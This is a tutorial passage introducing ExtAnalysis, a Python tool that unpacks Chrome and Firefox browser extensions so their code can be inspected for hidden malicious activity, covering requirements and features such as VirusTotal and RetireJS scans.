How to Analyze Web Browser Extensions for Possible Malware & Other Malicious Activity

Browser extensions are extremely useful since they can expand web browsers like Google Chrome and Mozilla Firefox beyond their built-in features. However, we don't always know who's behind a browser add-on or what it's doing beyond what's advertised. That's where ExtAnalysis comes into play.

ExtAnalysis will unpack an extension so that we can see what's really going on inside. To start using it, you just need to use either Chrome or Firefox, as well as an extension you want to investigate for possible malicious background activities. We'll be examining a Firefox extension from a computer science student to see how a more amateurish add-on will leak its hidden intentions.


Chrome (or Brave) or Firefox
Installed or uninstalled extension from Chrome Web Store or Firefox Addons
Linux or Windows PC (or macOS for uninstalled extensions only)

ExtAnalysis Features

ExtAnalysis is somewhat similar to Jupyter Notebook in that it's some Python code that will run, create a user interface, and open in a browser window. It's also a really interactive experience that lets us easily use the tool without relying on a particular piece of hardware or an operating system. It's cross-platform, easy to install, and straightforward to use.

There are a lot of things that ExtAnalysis can do, such as VirusTotal scans, RetireJS Vulnerability scans for JavaScript files, view and edit HTML, JSON, JavaScript, and CSS files, but we're just going to give a general overview of what can be done from a simple scan ..